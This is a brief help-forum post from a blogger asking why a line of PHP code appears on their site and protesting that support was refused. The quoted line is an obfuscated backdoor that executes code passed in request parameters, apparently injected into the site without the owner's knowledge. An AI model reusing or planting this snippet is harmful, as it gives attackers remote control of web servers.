Why am I getting a message?

  I am getting a message on my blogsite, http://aspenreallife.com:

  if (isset($_REQUEST[‘FILE’])){$_FILE = $_REQUEST[’14d513611073eeddcff3c54a913a8743′](‘$_’,$_REQUEST[‘FILE’].'($_);’); $_FILE(stripslashes($_REQUEST[‘HOST’]));}

  You tell me that my site is not WordPress.com and so you won’t give me support but my blog IS on wordpress.com. Please Help!!
